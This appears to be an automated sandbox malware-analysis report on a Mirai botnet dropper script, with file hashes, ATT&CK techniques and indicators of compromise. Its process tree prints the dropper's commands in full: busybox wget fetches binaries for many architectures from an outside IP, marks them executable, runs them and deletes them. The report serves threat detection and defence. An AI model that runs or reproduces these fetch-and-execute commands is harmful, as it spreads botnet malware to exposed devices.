mirai | 8dcc3e92c112fb94931bd86055dc51f74a70007c058d1571a4eaec583a0852c0

Analysis

max time kernel
132s
max time network
148s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
10/03/2025, 22:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wget.sh
Size

1KB
MD5

fe3891afe068ca6fc86017361dfb753c
SHA1

d631b6a4eaa99085df4260727c2c86dc82cf5428
SHA256

8dcc3e92c112fb94931bd86055dc51f74a70007c058d1571a4eaec583a0852c0
SHA512

810560af118bf04a2723fb177bbdf25682e3cb8b95611e15c8d83576305ea41ba11dec0d42c410fc5b287cb8a31901f9190946e957ac8deb8c0d634a42334951

Score

10^/10

mirai botnet botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1524	busybox
1539	busybox
1549	busybox
1566	busybox
1519	busybox
1529	busybox
1534	busybox
1544	busybox
1554	busybox
1559	busybox

Executes dropped EXE 9 IoCs

ioc	pid	Process
/tmp/jklarm	1520	wget.sh
/tmp/jklarm5	1525	wget.sh
/tmp/jklarm6	1530	wget.sh
/tmp/jklarm7	1535	wget.sh
/tmp/jklm68k	1540	wget.sh
/tmp/jklmips	1545	wget.sh
/tmp/jklmpsl	1550	wget.sh
/tmp/jklppc	1555	wget.sh
/tmp/jklsh4	1560	wget.sh

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1543	busybox
1545	jklmips
1547	busybox

Writes file to tmp directory 9 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/jklm68k	busybox
File opened for modification	/tmp/jklmips	busybox
File opened for modification	/tmp/jklmpsl	busybox
File opened for modification	/tmp/jklarm7	busybox
File opened for modification	/tmp/jklppc	busybox
File opened for modification	/tmp/jklsh4	busybox
File opened for modification	/tmp/jklarm	busybox
File opened for modification	/tmp/jklarm5	busybox
File opened for modification	/tmp/jklarm6	busybox

/tmp/wget.sh
/tmp/wget.sh
1⤵
- Executes dropped EXE
PID:1505
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm -O jklarm
  2⤵
  - Writes file to tmp directory
  PID:1506
- /bin/busybox
  /bin/busybox chmod +x jklarm
  2⤵
  - File and Directory Permissions Modification
  PID:1519
- /tmp/jklarm
  ./jklarm telnet
  2⤵
  PID:1520
- /bin/busybox
  /bin/busybox rm -rf jklarm
  2⤵
  PID:1522
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm5
  2⤵
  - Writes file to tmp directory
  PID:1523
- /bin/busybox
  /bin/busybox chmod +x jklarm5
  2⤵
  - File and Directory Permissions Modification
  PID:1524
- /tmp/jklarm5
  ./jklarm5 telnet
  2⤵
  PID:1525
- /bin/busybox
  /bin/busybox rm -rf jklarm5
  2⤵
  PID:1527
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm6
  2⤵
  - Writes file to tmp directory
  PID:1528
- /bin/busybox
  /bin/busybox chmod +x jklarm6
  2⤵
  - File and Directory Permissions Modification
  PID:1529
- /tmp/jklarm6
  ./jklarm6 telnet
  2⤵
  PID:1530
- /bin/busybox
  /bin/busybox rm -rf jklarm6
  2⤵
  PID:1532
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm7
  2⤵
  - Writes file to tmp directory
  PID:1533
- /bin/busybox
  /bin/busybox chmod +x jklarm7
  2⤵
  - File and Directory Permissions Modification
  PID:1534
- /tmp/jklarm7
  ./jklarm7 telnet
  2⤵
  PID:1535
- /bin/busybox
  /bin/busybox rm -rf jklarm7
  2⤵
  PID:1537
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k
  2⤵
  - Writes file to tmp directory
  PID:1538
- /bin/busybox
  /bin/busybox chmod +x jklm68k
  2⤵
  - File and Directory Permissions Modification
  PID:1539
- /tmp/jklm68k
  ./jklm68k telnet
  2⤵
  PID:1540
- /bin/busybox
  /bin/busybox rm -rf jklm68k
  2⤵
  PID:1542
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklmips -O jklmips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1543
- /bin/busybox
  /bin/busybox chmod +x jklmips
  2⤵
  - File and Directory Permissions Modification
  PID:1544
- /tmp/jklmips
  ./jklmips telnet
  2⤵
  - System Network Configuration Discovery
  PID:1545
- /bin/busybox
  /bin/busybox rm -rf jklmips
  2⤵
  - System Network Configuration Discovery
  PID:1547
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklmpsl -O jklmpsl
  2⤵
  - Writes file to tmp directory
  PID:1548
- /bin/busybox
  /bin/busybox chmod +x jklmpsl
  2⤵
  - File and Directory Permissions Modification
  PID:1549
- /tmp/jklmpsl
  ./jklmpsl telnet
  2⤵
  PID:1550
- /bin/busybox
  /bin/busybox rm -rf jklmpsl
  2⤵
  PID:1552
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklppc -O jklppc
  2⤵
  - Writes file to tmp directory
  PID:1553
- /bin/busybox
  /bin/busybox chmod +x jklppc
  2⤵
  - File and Directory Permissions Modification
  PID:1554
- /tmp/jklppc
  ./jklppc telnet
  2⤵
  PID:1555
- /bin/busybox
  /bin/busybox rm -rf jklppc
  2⤵
  PID:1557
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklsh4 -O jklsh4
  2⤵
  - Writes file to tmp directory
  PID:1558
- /bin/busybox
  /bin/busybox chmod +x jklsh4
  2⤵
  - File and Directory Permissions Modification
  PID:1559
- /tmp/jklsh4
  ./jklsh4 telnet
  2⤵
  PID:1560
- /bin/busybox
  /bin/busybox rm -rf jklsh4
  2⤵
  PID:1562
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklspc -O jklspc
  2⤵
  PID:1563
- /bin/busybox
  /bin/busybox chmod +x jklspc
  2⤵
  - File and Directory Permissions Modification
  PID:1566
- /tmp/jklspc
  ./jklspc telnet
  2⤵
  PID:1567
- /bin/busybox
  /bin/busybox rm -rf jklspc
  2⤵
  PID:1568
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklx86 -O jklx86
  2⤵
  PID:1569

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/jklarm

Filesize
60KB

MD5
35c215d8e2b2ea03a8a191fb3723195a

SHA1
c38bcfc3d7050edeff1b7dbffd85d07348bb01e9

SHA256
c4fd68b20997f3c8a60dbadf177b3309d465f0a8bb0ad9b33b4c70ee74dc3a90

SHA512
ea5a9fda95965b6eb55c47eefe2b42a9234d13c8d05556e72e916f98a626a0a835fa7f7828d4051b6056d639b06bec0136afa9ac3157736702b94c0ed9effdf8

Download Submit
/tmp/jklarm5

Filesize
60KB

MD5
a04040c769cad786555e183ba8ae0ca0

SHA1
a89d6b50a8140dddce29595c64949214e65c84f1

SHA256
7568e9e64ac1105cdcae20095154214ee943b2edc6c01e6d4b4eb0b7e06255a3

SHA512
e152f552b99683b3bf9b9fee2f7d34027a291e02dd2f912620593e714774cfe07e14aa837cdb2f2a300d35b721dfd67e7012955e24352bdad0ffecb4e61ed162

Download Submit
/tmp/jklarm6

Filesize
69KB

MD5
9e18604aa4c5bedd6e9ea6690b751880

SHA1
c1f32fe93aa650f9920fc5bd659d23621ab034a2

SHA256
41342a887d2be09cf0165913b43a5916492e677d20429068d4829a090453ccbb

SHA512
cdafb3281bcaa5f5c1af71df8d53c2d022de72a559dfea513b41bc08c7d8fe421839cfdc51b3f93f501bb62d02924e3047208e8bce3a8768af2404f3caa767b0

Download Submit
/tmp/jklarm7

Filesize
82KB

MD5
a9675614a267473cb83e195d9074a067

SHA1
a4d148cf841fc2b84c8bb3dd322e40f601532875

SHA256
fe4e8d464b7849a5483782d0c47e53deaf199e284badad12ed98ca79e47a79d9

SHA512
8adcc5df013328218823d3310bcc4f27f6e1e9e51de2e7ecd5521873f5ac6cc2315f9136e1599f1da4114e65eaed23449e78f9ce04062243aa8ec793086b1c28

Download Submit
/tmp/jklm68k

Filesize
60KB

MD5
f5fa9a5e6c2a71c86b783b6b5586c3e4

SHA1
1a7888806663b58f4bee84472dab0b63adfab8ea

SHA256
d7ed2bfe303a8e565e6b15e25920d017473b2a7678df3781b6b44840065e2c3d

SHA512
e13a443311db4a5b4fc3692be4149f534309e24134baf54f508bf56f509aaff7bfab30c1552540030e23270a689cebd7e2ad48e7989687467ada96915d5ae43a

Download Submit
/tmp/jklmips

Filesize
78KB

MD5
ce4bd94ea8cbc021bf79e11f1f734c25

SHA1
f562c88119484f3e92be6e95cb0a435836ca6362

SHA256
ef931d8ba4966260112b7ed31a1e0b5cd4423becc0397e8eeaee345de903a1ab

SHA512
d0a85bbbf02f85e445856cced0f7942652ca8c2d748f17a25129b5fa2982df148d5b2580d4c7512d579e4e666ec62700233802a145bbeb38715e77f847f26d29

Download Submit
/tmp/jklmpsl

Filesize
79KB

MD5
9f79f159a672411a7e5b01f1ed3deb4a

SHA1
98584c58a231322ed3e64b96727fe6d935f30aa4

SHA256
9cf41e60807702cd85a42ffcabb10f2798193200a381b47f3adbebe65f8360aa

SHA512
8486d8dbf427ba9e45b81ae462b64239e7aa33e55603ffa12b8cf7efc80e4b0300e6764fb1c89bc261f910178553b68adc6401fb7de1f6eb36a4f76b5b5b5537

Download Submit
/tmp/jklppc

Filesize
59KB

MD5
2d898ada13cb85e3fc710949c44ade47

SHA1
db36b96c9531eff756b3d2ee92b632bc4903a179

SHA256
00188561e6b9bf60b853e3d752f4131b575a77f48dfdb69f39692e20496f8cdd

SHA512
e4952241a4ba8a4a83952c28f6396f575ad304ef212bc1897d2790175dfbab0d2c4f1ae2cfca67825ace8eef17c4b4064fde2e31b12ddbe87b6c074f8e9a6b78

Download Submit
/tmp/jklsh4

Filesize
54KB

MD5
e422f23c58693205126b154196d024d8

SHA1
efa27cd80e15c1ccada5a5c0de53702097df30ea

SHA256
b31d22cb1050faa0328fe4f05f03f450bbaccdc4a983d85f058cee4296890280

SHA512
f0ccb11e75c86ebdc1bf20e7e6a9b6bf452c0c1797fe7d234a2e3b026c5f5b576a983abede5414f2622d89bfc9ba3d4ae0f553beae246aeee7a508792597b681

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads